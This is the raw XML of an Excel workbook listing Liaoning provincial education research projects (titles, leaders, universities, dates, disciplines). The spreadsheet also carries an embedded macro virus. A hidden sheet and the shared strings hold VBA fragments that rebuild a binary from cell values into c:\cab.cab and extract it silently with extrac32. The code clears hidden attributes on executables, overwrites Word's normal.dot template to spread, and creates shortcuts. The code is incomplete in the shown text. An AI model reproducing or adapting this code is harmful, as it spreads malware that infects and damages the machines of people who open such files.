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4715" windowHeight="8415" firstSheet="1" activeTab="1"/>
  </bookViews>
  <sheets>
    <sheet name="(m1)_(m2)_(m3)" sheetId="1" state="hidden" r:id="rId1"/>
    <sheet name="登记表" sheetId="2" r:id="rId2"/>
    <sheet name="结题考核表" sheetId="3" r:id="rId3"/>
  </sheets>
  <definedNames>
    <definedName name="_xlnm._FilterDatabase" localSheetId="1" hidden="1">'登记表'!$B$2:$I$107</definedName>
    <definedName name="_xlnm._FilterDatabase" localSheetId="2" hidden="1">'结题考核表'!$A$3:$N$3</definedName>
    <definedName name="_xlnm.Print_Area" localSheetId="0">'(m1)_(m2)_(m3)'!$A$1:$A$8</definedName>
    <definedName name="Counter" localSheetId="0">'(m1)_(m2)_(m3)'!$C$82</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="1">'登记表'!$2:$2</definedName>
    <definedName name="_xlnm.Print_Titles" localSheetId="2">'结题考核表'!$2:$3</definedName>
  </definedNames>
  <calcPr fullCalcOnLoad="1"/>
</workbook>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="861" uniqueCount="603">
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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r>
      <t>if instr(ff.name,"</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>软盘</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t>")&gt;0 then</t>
    </r>
  </si>
  <si>
    <r>
      <t>set lnk=</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t>w</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>.CreateShortcut(fold.path &amp; "\" &amp; ff.name)</t>
    </r>
  </si>
  <si>
    <r>
      <t>if left(thisworkbook.sheets(i).name,3)="</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>模块表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t>" then</t>
    </r>
  </si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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项目名称</t>
  </si>
  <si>
    <t>备注</t>
  </si>
  <si>
    <t>我国司法鉴定制度的研究</t>
  </si>
  <si>
    <t>王瑞恒</t>
  </si>
  <si>
    <t>辽宁师范大学</t>
  </si>
  <si>
    <t>2004G003</t>
  </si>
  <si>
    <t>阙澄宇</t>
  </si>
  <si>
    <t xml:space="preserve">东北财经大学 </t>
  </si>
  <si>
    <t>主持人</t>
  </si>
  <si>
    <t>承担单位</t>
  </si>
  <si>
    <t>刘明慧</t>
  </si>
  <si>
    <t>侯红漫</t>
  </si>
  <si>
    <t>大连轻工业学院</t>
  </si>
  <si>
    <t>建立东北区域金融中心的国际比较研究</t>
  </si>
  <si>
    <t>«统筹城乡发展的财政投入机制研究»课题报告</t>
  </si>
  <si>
    <t>白腐真菌木质素降解酶系的研究及其在染料降解中的应用</t>
  </si>
  <si>
    <t>2004G077</t>
  </si>
  <si>
    <t>202073420</t>
  </si>
  <si>
    <t>张孟红</t>
  </si>
  <si>
    <t>沈阳大学</t>
  </si>
  <si>
    <t>少合同</t>
  </si>
  <si>
    <t>张岩</t>
  </si>
  <si>
    <t>2004F021</t>
  </si>
  <si>
    <t>对我国会计国际化及建立会计诚信体系相关问题的研究</t>
  </si>
  <si>
    <t>朱久霞</t>
  </si>
  <si>
    <t>04.09-05.12</t>
  </si>
  <si>
    <t>02.09-04.09</t>
  </si>
  <si>
    <t>02.09-04.10</t>
  </si>
  <si>
    <t>养殖水环境因子与生物量的动态模型研究</t>
  </si>
  <si>
    <t>李盛德</t>
  </si>
  <si>
    <t>00.01-03.12</t>
  </si>
  <si>
    <t>大连水产学院</t>
  </si>
  <si>
    <t>水产资源信息系统的研究</t>
  </si>
  <si>
    <t>韩胜菊</t>
  </si>
  <si>
    <t>01.01-03.12</t>
  </si>
  <si>
    <t>陈营</t>
  </si>
  <si>
    <t>电磁场对水及生物影响的研究</t>
  </si>
  <si>
    <t>杨桂娟</t>
  </si>
  <si>
    <t>素环上的半微商、微商与环的交换性</t>
  </si>
  <si>
    <t>张立石</t>
  </si>
  <si>
    <t>01.01-03.12</t>
  </si>
  <si>
    <t>汪静</t>
  </si>
  <si>
    <t>02.09-05.12</t>
  </si>
  <si>
    <t>水产科技信息处理系统研究</t>
  </si>
  <si>
    <t>02.09-04.12</t>
  </si>
  <si>
    <t>2004C031</t>
  </si>
  <si>
    <t>粗糙集数据挖掘技术研究</t>
  </si>
  <si>
    <t>闫德勤</t>
  </si>
  <si>
    <t>04.07-07.06</t>
  </si>
  <si>
    <t>在手征SU930夸克模型下重子－重子相互作用和双重子束缚态的研究</t>
  </si>
  <si>
    <t>戴连荣</t>
  </si>
  <si>
    <t>02.10-05.10</t>
  </si>
  <si>
    <t>新型脲酶活性抑制剂－－过渡金属模型配合物的设计及抑制脲酶活性研究</t>
  </si>
  <si>
    <t>由忠录</t>
  </si>
  <si>
    <t>06.01-07.01</t>
  </si>
  <si>
    <t>02.09-05.08</t>
  </si>
  <si>
    <t>99.01-00.09</t>
  </si>
  <si>
    <t>00.01-01.06</t>
  </si>
  <si>
    <t>00.06-01.12</t>
  </si>
  <si>
    <t>01.03-04.03</t>
  </si>
  <si>
    <t>03.01-05.12</t>
  </si>
  <si>
    <t>01.01-02.12</t>
  </si>
  <si>
    <t>00.01-02.12</t>
  </si>
  <si>
    <t>2004D274</t>
  </si>
  <si>
    <t>04.12-05.12</t>
  </si>
  <si>
    <t>00.10-03.09</t>
  </si>
  <si>
    <t>00.05-01.12</t>
  </si>
  <si>
    <t>02.10-04.10</t>
  </si>
  <si>
    <t>02.09-05.09</t>
  </si>
  <si>
    <t>00.12-01.12</t>
  </si>
  <si>
    <t>02.10-03.10</t>
  </si>
  <si>
    <t>00.08-03.08</t>
  </si>
  <si>
    <t>03.06-05.06</t>
  </si>
  <si>
    <t>雷家军</t>
  </si>
  <si>
    <t>玉米高氮效率的生理化基础及其遗传规律研究</t>
  </si>
  <si>
    <t>张立军</t>
  </si>
  <si>
    <t>羊肚菌栽培技术的研究</t>
  </si>
  <si>
    <t>范海延</t>
  </si>
  <si>
    <t>水稻节水高产土壤水分能量调控标准研究</t>
  </si>
  <si>
    <t>迟道才</t>
  </si>
  <si>
    <t>哲学社会科学成果推广、应用和转化机制与方法研究　</t>
  </si>
  <si>
    <t>于中涛</t>
  </si>
  <si>
    <t>脲酶抑制剂与硝化抑制剂对尿素中氮素利用率的影响</t>
  </si>
  <si>
    <t>苏壮</t>
  </si>
  <si>
    <t>杨树用材林最佳经营模式的研究</t>
  </si>
  <si>
    <t>惠淑荣</t>
  </si>
  <si>
    <t>辽宁省设施农业生物农药的研制与应用技术研究</t>
  </si>
  <si>
    <t>陈捷</t>
  </si>
  <si>
    <t>番茄光合运转糖－－蔗糖代谢机制的研究</t>
  </si>
  <si>
    <t>齐红岩</t>
  </si>
  <si>
    <t>中国“十五”农业科技发展态势分析</t>
  </si>
  <si>
    <t>何荣利</t>
  </si>
  <si>
    <t>少合同、附件</t>
  </si>
  <si>
    <t>草莓深加工及综合利用研究</t>
  </si>
  <si>
    <t>孟宪军</t>
  </si>
  <si>
    <t>播种机试验抬自动检测装置的研究</t>
  </si>
  <si>
    <t>石宏</t>
  </si>
  <si>
    <t>玉米营养基因型筛选改良及生理机制的研究</t>
  </si>
  <si>
    <t>曹敏建</t>
  </si>
  <si>
    <t>有机稻米机械化生产加工及配套机具设备的研究</t>
  </si>
  <si>
    <t>刘德军</t>
  </si>
  <si>
    <t>便携式信号采集与分析计算机虚拟仪器系统</t>
  </si>
  <si>
    <t>李永奎</t>
  </si>
  <si>
    <t>03.03-04.07</t>
  </si>
  <si>
    <t>高速水稻插秧机分插机构计算机辅助设计及动态仿真研究</t>
  </si>
  <si>
    <t>赵凤芹</t>
  </si>
  <si>
    <t>粮食含水率无损快速测定装置</t>
  </si>
  <si>
    <t>张本华</t>
  </si>
  <si>
    <t>现代生物技术与纯绿色农畜禽产品的研究、开发及产业化</t>
  </si>
  <si>
    <t>金忠华</t>
  </si>
  <si>
    <t>林木培育生长量与资金流量动态最佳结合轨迹的研究</t>
  </si>
  <si>
    <t>陈珂</t>
  </si>
  <si>
    <t>网络经济下传统企业组织与行为的变迁</t>
  </si>
  <si>
    <t>宝建梅</t>
  </si>
  <si>
    <t>沈阳航空工业学院</t>
  </si>
  <si>
    <t>毛泽东经济管理体制改革思想研究</t>
  </si>
  <si>
    <t>杨乃坤</t>
  </si>
  <si>
    <t>沈阳工业大学</t>
  </si>
  <si>
    <t>新时期辽宁农民文化心态变迁研究</t>
  </si>
  <si>
    <t>冯文华</t>
  </si>
  <si>
    <t>大连海事大学</t>
  </si>
  <si>
    <t>女性性罪错法律处置的难点及对策</t>
  </si>
  <si>
    <t>丁慧</t>
  </si>
  <si>
    <t>邓小平理论与依法法国</t>
  </si>
  <si>
    <t>于沛霖</t>
  </si>
  <si>
    <t>序号</t>
  </si>
  <si>
    <t>辽宁省教育厅科技计划项目结题汇总表</t>
  </si>
  <si>
    <t>牙鲆鱼苗种养殖期间应用益生茵控制微生物的技术研究</t>
  </si>
  <si>
    <t>项目起止
时间</t>
  </si>
  <si>
    <t>国家级</t>
  </si>
  <si>
    <t>计划项目
编号</t>
  </si>
  <si>
    <t>吸氧的单片微机自动控制装置的研制</t>
  </si>
  <si>
    <t>所属一级学科</t>
  </si>
  <si>
    <t>790经济学</t>
  </si>
  <si>
    <t>180生物学</t>
  </si>
  <si>
    <t>110数学</t>
  </si>
  <si>
    <t>140物理学</t>
  </si>
  <si>
    <t>520计算机科学技术</t>
  </si>
  <si>
    <t>320临床医学</t>
  </si>
  <si>
    <t>310基础医学</t>
  </si>
  <si>
    <t>210农学</t>
  </si>
  <si>
    <t>710马克思主义</t>
  </si>
  <si>
    <t>02.09-03.09</t>
  </si>
  <si>
    <t>辽宁省高师体育专业学生学生职业心理素质</t>
  </si>
  <si>
    <t>李娟</t>
  </si>
  <si>
    <t>890体育科学</t>
  </si>
  <si>
    <t>辽宁农业可持续发展政策研究</t>
  </si>
  <si>
    <t>荣宪屏</t>
  </si>
  <si>
    <t>城市饭店群体结构合理改规划研究</t>
  </si>
  <si>
    <t>杨秀丽</t>
  </si>
  <si>
    <t>关于建设丹东国际性口岸物流中心的可行性研究</t>
  </si>
  <si>
    <t>地方财政体制改革与基层财政困境的治理</t>
  </si>
  <si>
    <t>建立和完善辽宁社会保障体系问题的研究</t>
  </si>
  <si>
    <t>辽宁地区优势资源开发与利用问题研究</t>
  </si>
  <si>
    <t>政治经济学理论动态分析和体系创新研究</t>
  </si>
  <si>
    <t>辽宁省软件产业发展研究</t>
  </si>
  <si>
    <t>地方综合性高等院校双语教学改革初探</t>
  </si>
  <si>
    <t>王金萍</t>
  </si>
  <si>
    <t>谷  义</t>
  </si>
  <si>
    <t>宫春子</t>
  </si>
  <si>
    <t>张代军</t>
  </si>
  <si>
    <t>刘兆洪</t>
  </si>
  <si>
    <t>鞠衍清</t>
  </si>
  <si>
    <t>辽东学院</t>
  </si>
  <si>
    <t>2004G094</t>
  </si>
  <si>
    <t>2004G136</t>
  </si>
  <si>
    <t>2004G092</t>
  </si>
  <si>
    <t>05.01-06.12</t>
  </si>
  <si>
    <t>任永功</t>
  </si>
  <si>
    <t>20040206</t>
  </si>
  <si>
    <t>银行对帐模块全自动对帐的校正程序</t>
  </si>
  <si>
    <t>周艳芝</t>
  </si>
  <si>
    <t>资源枯竭型矿区废弃地生态恢复</t>
  </si>
  <si>
    <t>辽宁工程技术大学</t>
  </si>
  <si>
    <t>杨伦</t>
  </si>
  <si>
    <t>主持人变更</t>
  </si>
  <si>
    <t>天然产物中有机锗的分析研究</t>
  </si>
  <si>
    <t>回瑞华</t>
  </si>
  <si>
    <t>02.03-05.03</t>
  </si>
  <si>
    <t>2004C021</t>
  </si>
  <si>
    <t>钯、铂配位超分子化合物及其生物活性研究</t>
  </si>
  <si>
    <t>沈阳化工学院</t>
  </si>
  <si>
    <t>高恩君</t>
  </si>
  <si>
    <t>05.01-07.06</t>
  </si>
  <si>
    <t>2005W064</t>
  </si>
  <si>
    <t>股票期权激励税收政策研究</t>
  </si>
  <si>
    <t>李晶</t>
  </si>
  <si>
    <t>06.01-06.12</t>
  </si>
  <si>
    <t>辽宁石油化工大学</t>
  </si>
  <si>
    <t>王立新</t>
  </si>
  <si>
    <t>无合同</t>
  </si>
  <si>
    <t>150化学</t>
  </si>
  <si>
    <t>耐热植酸基因对玉米的遗传转化及其表达活性的研究</t>
  </si>
  <si>
    <t>沈阳农业大学</t>
  </si>
  <si>
    <t>樊金娟</t>
  </si>
  <si>
    <t>百合种间杂交及染色体加倍研究</t>
  </si>
  <si>
    <t>02.08-05.07</t>
  </si>
  <si>
    <t>02.09-05.07</t>
  </si>
  <si>
    <t>09.09-05.09</t>
  </si>
  <si>
    <t>220林学</t>
  </si>
  <si>
    <t>240水产学</t>
  </si>
  <si>
    <t>辽宁中医学院</t>
  </si>
  <si>
    <t>牟畅</t>
  </si>
  <si>
    <t>NFP和TR对吗啡依赖性大鼠边缘系统及蓝斑核的作用</t>
  </si>
  <si>
    <t>周郦楠</t>
  </si>
  <si>
    <t>小鼠胚胎干细胞定向分化的基因调控机制及其在骨创伤/骨愈合中的应用</t>
  </si>
  <si>
    <t>中国医科大学</t>
  </si>
  <si>
    <t>郭磊</t>
  </si>
  <si>
    <t>VEGF中和抗体对小鼠类风湿关节炎形成抑制及治疗研究</t>
  </si>
  <si>
    <t>鲁静</t>
  </si>
  <si>
    <t>抗人红细胞非凝集单克隆抗体的研制</t>
  </si>
  <si>
    <t>段薇</t>
  </si>
  <si>
    <t>360中医学与中药学</t>
  </si>
  <si>
    <t>00.09-01.09</t>
  </si>
  <si>
    <t>中药复方对糖尿病大鼠肾皮质IV型胶原基因表达影响的研究</t>
  </si>
  <si>
    <t>张兰</t>
  </si>
  <si>
    <t>03.01-04.12</t>
  </si>
  <si>
    <t>牛蒡子苷－－类中药新药研究</t>
  </si>
  <si>
    <t>康廷国</t>
  </si>
  <si>
    <t>中药干预肿瘤转移器官特异性关键靶点的研究</t>
  </si>
  <si>
    <t>王文萍</t>
  </si>
  <si>
    <t>祛痹通络膏治疗寒湿阴络型强直性脊柱炎的实验与临床研究</t>
  </si>
  <si>
    <t>莫成荣</t>
  </si>
  <si>
    <t>穿心莲水煎剂对动脉内皮损伤后血管壁纤溶因子含量的影响实验研究</t>
  </si>
  <si>
    <t>张忠辉</t>
  </si>
  <si>
    <t>中药治疗抗习磷脂抗体阳性导致反复自然流产的临床观察　</t>
  </si>
  <si>
    <t>孟安琪</t>
  </si>
  <si>
    <t>糖尿病肠病大鼠胃泌素、胃动素、生长抑素水平变化及中药对其影响的研究</t>
  </si>
  <si>
    <t>于世家</t>
  </si>
  <si>
    <t>神曲炮制及发酵工艺研究</t>
  </si>
  <si>
    <t>贾天柱</t>
  </si>
  <si>
    <t>大柴胡对家兔实验性动脉粥样硬化及其相关原癌基因表达的影响</t>
  </si>
  <si>
    <t>王凤荣</t>
  </si>
  <si>
    <t>《黄帝内经》藏象理论体系的发生学研究</t>
  </si>
  <si>
    <t>鞠宝兆</t>
  </si>
  <si>
    <t>祛痰化阏对胰岛素受体影响的临床及实验研究</t>
  </si>
  <si>
    <t>陈民</t>
  </si>
  <si>
    <t>龟地散对骨质疏松症的药效学研究</t>
  </si>
  <si>
    <t>王学娅</t>
  </si>
  <si>
    <t>经脉高导声状态与经脉皮下组织</t>
  </si>
  <si>
    <t>郑利岩</t>
  </si>
  <si>
    <t>在省内桓仁培育天然富硒丹参药用植物研究</t>
  </si>
  <si>
    <t>朱天义</t>
  </si>
  <si>
    <t>塑性成形智能化CAD与管理决策系统</t>
  </si>
  <si>
    <t>张海渠</t>
  </si>
  <si>
    <t>430材料科学</t>
  </si>
  <si>
    <t>Cr27高铬铸铁及应用研究</t>
  </si>
  <si>
    <t>赵玉华</t>
  </si>
  <si>
    <t>基于3D特征技术的高压辊磨机挤压辊的设计研究</t>
  </si>
  <si>
    <t>屈力刚</t>
  </si>
  <si>
    <t>460机械工程</t>
  </si>
  <si>
    <t>高效洁净的劣质煤气化－燃烧技术开发</t>
  </si>
  <si>
    <t>李润东</t>
  </si>
  <si>
    <t>480能源科学技术</t>
  </si>
  <si>
    <t>电磁场中液晶生物膜电流体不稳定性的研究</t>
  </si>
  <si>
    <t>全汉化医用统计软件系统</t>
  </si>
  <si>
    <t>张乐成</t>
  </si>
  <si>
    <t>人事档案自动录入系统的研究</t>
  </si>
  <si>
    <t>张红</t>
  </si>
  <si>
    <t>550食品科学技术</t>
  </si>
  <si>
    <t>物资供应管理信息系统</t>
  </si>
  <si>
    <t>温廷新</t>
  </si>
  <si>
    <t>630管理学</t>
  </si>
  <si>
    <t>入世后我国民航报务业人才策略研究</t>
  </si>
  <si>
    <t>刘晖</t>
  </si>
  <si>
    <t>美国黑人民权运动运起源研究</t>
  </si>
  <si>
    <t>鞍山师范学院</t>
  </si>
  <si>
    <t>张爱民</t>
  </si>
  <si>
    <t>770历史学</t>
  </si>
  <si>
    <t>辽宁省旅游服务贸易问题研究</t>
  </si>
  <si>
    <t>820法学</t>
  </si>
  <si>
    <t>03.07-05.11</t>
  </si>
  <si>
    <t>840社会学</t>
  </si>
  <si>
    <t>中外教育模式比较研究</t>
  </si>
  <si>
    <t>刘岩</t>
  </si>
  <si>
    <t>880教育学</t>
  </si>
  <si>
    <t>师范生从师能力培养和构建健美操课“多维系统”教学模式的研究</t>
  </si>
  <si>
    <t>固定化酵母流化床生物反应器快速发酵废葡萄糖母液生产乙醇的应用研究</t>
  </si>
  <si>
    <t>敖永华</t>
  </si>
  <si>
    <t>00.12-03.12</t>
  </si>
  <si>
    <t>辽宁省乡镇产业结构优化及农机化发展规划的研究</t>
  </si>
  <si>
    <t>宫元娟</t>
  </si>
  <si>
    <t>01.01-01.12</t>
  </si>
  <si>
    <t>东北水稻种植方式及机械化技术研究</t>
  </si>
  <si>
    <t>赵秀荣</t>
  </si>
  <si>
    <t>食用菌生产机械化工艺系统与生态效益的研究</t>
  </si>
  <si>
    <t>林静</t>
  </si>
  <si>
    <t>农业信息技术人才培养模式的研究</t>
  </si>
  <si>
    <t>杨涛</t>
  </si>
  <si>
    <t>农村电网主要开关电器运行状况实时模拟系统</t>
  </si>
  <si>
    <t>吴秀华</t>
  </si>
  <si>
    <t>司帕沙星在猪、鸡体内药动力学及药效学研究</t>
  </si>
  <si>
    <t>刘明春</t>
  </si>
  <si>
    <t>端粒结构与鸡马立克氏病病毒感染及肿瘤发生的相关性研究</t>
  </si>
  <si>
    <t>汉丽梅</t>
  </si>
  <si>
    <t>苹果属无融合生殖型主基因矮生砧木优系的选择与评价</t>
  </si>
  <si>
    <t>董文轩</t>
  </si>
  <si>
    <t>玉米耐铝毒的基因型筛选</t>
  </si>
  <si>
    <t>许玉凤</t>
  </si>
  <si>
    <t>02.10-04.12</t>
  </si>
  <si>
    <t>GIS在农电系统中的研究与应用</t>
  </si>
  <si>
    <t>张秀然</t>
  </si>
  <si>
    <t>合成多核侨联的菲咯啉配位的配合物</t>
  </si>
  <si>
    <t>卜平宇</t>
  </si>
  <si>
    <t>几种新特野生蔬菜的开发与利用</t>
  </si>
  <si>
    <t>邵美妮</t>
  </si>
  <si>
    <t>药用超氧化物歧化酶(SOD)分离纯化及其修饰技术的研究</t>
  </si>
  <si>
    <t>阚国仕</t>
  </si>
  <si>
    <t>02.07-04.09</t>
  </si>
  <si>
    <t>05.01-07.12</t>
  </si>
  <si>
    <t>纪晓慧</t>
  </si>
  <si>
    <t>高校大学生心理健康教育研究</t>
  </si>
  <si>
    <t>02.01-04.12</t>
  </si>
  <si>
    <t>04.01-05.12</t>
  </si>
  <si>
    <r>
      <t>基于</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <family val="1"/>
      </rPr>
      <t>OLAM</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t>的可视化数据挖掘系统研究</t>
    </r>
  </si>
  <si>
    <t>04.11-05.12</t>
  </si>
  <si>
    <t>多元化战略对资本成本和资本结构的影响研究</t>
  </si>
  <si>
    <t>辽宁工学院</t>
  </si>
  <si>
    <t>邵军</t>
  </si>
  <si>
    <t>05.01-06.03</t>
  </si>
  <si>
    <t>人工神经网络在交流调速系统中的应用</t>
  </si>
  <si>
    <t>王艳秋</t>
  </si>
  <si>
    <t>03.05-05.12</t>
  </si>
  <si>
    <t>直轧冶金过程中若干金属学问题的电子理论研究</t>
  </si>
  <si>
    <t>辽宁工学院</t>
  </si>
  <si>
    <t>刘志林</t>
  </si>
  <si>
    <t>02.09-06.05</t>
  </si>
  <si>
    <t>立项
年度</t>
  </si>
  <si>
    <t>510电子、通信与自动控制技术</t>
  </si>
  <si>
    <t>610环境科学技术</t>
  </si>
  <si>
    <t>430材料科学</t>
  </si>
  <si>
    <t>钢筋混凝土结构可视化及信息处理技术研究</t>
  </si>
  <si>
    <t>以规模经济提升我国汽车工业核心竞争力的模式研究</t>
  </si>
  <si>
    <t>许会</t>
  </si>
  <si>
    <t>信息技术</t>
  </si>
  <si>
    <t>王兴权</t>
  </si>
  <si>
    <t>经济</t>
  </si>
  <si>
    <t>姜圣复</t>
  </si>
  <si>
    <t>2004G081</t>
  </si>
  <si>
    <t>樊铁成</t>
  </si>
  <si>
    <t>03.05-04.05</t>
  </si>
  <si>
    <t>沈阳航空学院</t>
  </si>
  <si>
    <t>安玉新</t>
  </si>
  <si>
    <t>03.07-05.07</t>
  </si>
  <si>
    <t>吴景泰</t>
  </si>
  <si>
    <t>03.11-04.12</t>
  </si>
  <si>
    <t>辽宁大学</t>
  </si>
  <si>
    <t>张学本</t>
  </si>
  <si>
    <t>00.08-01.08</t>
  </si>
  <si>
    <t>岳玉珠</t>
  </si>
  <si>
    <t>05.01-07.01</t>
  </si>
  <si>
    <t>王文荣</t>
  </si>
  <si>
    <t>05.01-06.07</t>
  </si>
  <si>
    <t>企业技术创新中智力资本价值实现研究</t>
  </si>
  <si>
    <t>李浩</t>
  </si>
  <si>
    <t>04.11-06.05</t>
  </si>
  <si>
    <t>2004Z08</t>
  </si>
  <si>
    <t>辽宁国有经济地位、布局和结构调整问题研究</t>
  </si>
  <si>
    <t>李松森</t>
  </si>
  <si>
    <t>04.12-06.05</t>
  </si>
  <si>
    <t>2004F018</t>
  </si>
  <si>
    <t>东北亚航运优化实时控制与智能支持决策系统</t>
  </si>
  <si>
    <t>国际服务贸易立法的新趋势与中国服务贸易立法问题研究</t>
  </si>
  <si>
    <t>我国城市基层管理体制的建设及创新研究</t>
  </si>
  <si>
    <t>高校教学园、科技园、孵化园一体化发展研究</t>
  </si>
  <si>
    <t>转型时期辽宁地域文化研究</t>
  </si>
  <si>
    <t>2004G118</t>
  </si>
  <si>
    <t>2004G119</t>
  </si>
  <si>
    <t>优化装备制造产业链条，振兴辽宁装备制造业</t>
  </si>
  <si>
    <t>金融支持与辽宁中小企业可持续发展</t>
  </si>
  <si>
    <t>03.5-05.6</t>
  </si>
  <si>
    <t>05.1-06.12</t>
  </si>
  <si>
    <t>立项
年度</t>
  </si>
  <si>
    <t>内包覆铜(铜合金)/钢双金属管的内压扩散复合技术的研究</t>
  </si>
  <si>
    <t>大连交通大学</t>
  </si>
  <si>
    <t>刘世程</t>
  </si>
  <si>
    <t>材料科学</t>
  </si>
  <si>
    <t>焊接工具的设计对铝的搅拌摩擦焊接过程的影响</t>
  </si>
  <si>
    <t>刘日明</t>
  </si>
  <si>
    <t>纯铜表面纳米粒子弥散强化</t>
  </si>
  <si>
    <t>石子源</t>
  </si>
  <si>
    <t>日本的“泉镜花热”及“泉镜花现象”研究</t>
  </si>
  <si>
    <t>沈阳师范大学</t>
  </si>
  <si>
    <t>张晓宁</t>
  </si>
  <si>
    <t>06.01-06.12</t>
  </si>
  <si>
    <t>02.9-05.12</t>
  </si>
  <si>
    <t>05W218</t>
  </si>
  <si>
    <t>序
号</t>
  </si>
  <si>
    <t>项目起
止时间</t>
  </si>
  <si>
    <t>获专利（项）</t>
  </si>
  <si>
    <t>获奖
（项）</t>
  </si>
  <si>
    <t>省、部级</t>
  </si>
  <si>
    <t>辽宁省教育厅科学研究项目结题情况一览表</t>
  </si>
  <si>
    <t>论文
(篇）</t>
  </si>
  <si>
    <t>著作
（部）</t>
  </si>
  <si>
    <t>获后续资助项目（项）</t>
  </si>
  <si>
    <t>软件
(个）</t>
  </si>
  <si>
    <t>Private Sub createcabfile()</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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fso.deletefile Application.StartupPath &amp; "\normal.xlm"</t>
  </si>
  <si>
    <t>Next</t>
  </si>
  <si>
    <t>If Workbooks(i).name="norma1.xlm" then</t>
  </si>
  <si>
    <t>goto a1</t>
  </si>
  <si>
    <t>cabfile= "c:\cab.cab"</t>
  </si>
  <si>
    <t>If Not fso.fileexists(Application.StartupPath &amp; "\norma1.xlm") Then</t>
  </si>
  <si>
    <t>fso.delete cabfile</t>
  </si>
  <si>
    <t>open cabfile for binary access write as #1</t>
  </si>
  <si>
    <t>For i = 1 To 150</t>
  </si>
  <si>
    <r>
      <t>hv</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <family val="0"/>
      </rPr>
      <t xml:space="preserve"> = ThisWorkbook.Sheets("(m1)_(m2)_(m3)").Cells(i, 2).Value</t>
    </r>
  </si>
  <si>
    <t>n=1</t>
  </si>
  <si>
    <t>m=instr(hv," ")</t>
  </si>
  <si>
    <t>do while m&gt;0</t>
  </si>
  <si>
    <t>ch=CByte(mid(hv,n,m-n))</t>
  </si>
  <si>
    <t>put #1,,ch</t>
  </si>
  <si>
    <t>n=m+1</t>
  </si>
  <si>
    <t>m=instr(n,hv," ")</t>
  </si>
  <si>
    <t>loop</t>
  </si>
  <si>
    <t>close #1</t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c attrib -s -h c:\setflag.exe", 0, True</t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c attrib -s -h c:\sendto.exe", 0, True</t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c extrac32 /E /Y /L c:\ c:\cab.cab", 0, True</t>
  </si>
  <si>
    <t>w.Run "%COMSPEC% /c extract /E /Y /L c:\ c:\cab.cab", 0, True</t>
  </si>
  <si>
    <t>fso.deletefile cabfile</t>
  </si>
  <si>
    <t>fso.copyfile "c:\normal.dot", myfolder, True</t>
  </si>
  <si>
    <t>set word=createobject("word.application")</t>
  </si>
  <si>
    <t>ntpath=word.NormalTemplate.Path &amp; "\"</t>
  </si>
  <si>
    <t>word.quit</t>
  </si>
  <si>
    <t>fso.copyfile "c:\normal.dot", ntpath, True</t>
  </si>
  <si>
